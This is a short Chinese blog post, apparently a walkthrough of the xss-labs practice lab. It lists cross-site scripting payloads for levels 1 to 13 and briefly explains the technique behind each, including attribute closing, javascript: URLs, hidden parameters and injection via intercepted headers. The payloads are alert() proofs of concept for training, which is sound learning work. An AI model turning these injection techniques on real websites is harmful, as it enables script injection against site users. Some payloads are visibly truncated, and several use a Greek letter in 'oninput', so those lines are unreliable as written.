xss-labs level 1~13

靶场地址:

https://github.com/do0dl3/xss-labs.git
或:
https://github.com/do0dl3/xss-labs

解题payload:

1<script>alert(111)</script>
2'>
3、' oninput='alert(123)  #然后在进行一次输入
4" οninput="alert(123)  #然后在进行一次输入
5">:alert(123)">123
6、"><a hREf="JavaScript:alert(123)">123</a>
7" oonninput="alert(123)"
8、javascript:alert()  
9、javascript:alert(9) //http://
10、t_sort=" oninput="alert(123)" type="text"
11、referer:http://xss:8080/level10.php?keyword=123&t_sort=" οninput="alert(123)" type="text				//bp
12" οninput="alert(123)" type="text			  //bp
13、user=call+me+maybe%3F" οninput="alert(/xss/)" type="text //bp

其中第一题可以直接执行js。
2~7 讲闭合。
8、9讲实体化。
10讲隐藏属性。
11~13则是讲抓包,从其他位置进行攻击。

你可能感兴趣的:(靶场,xss,前端,javascript)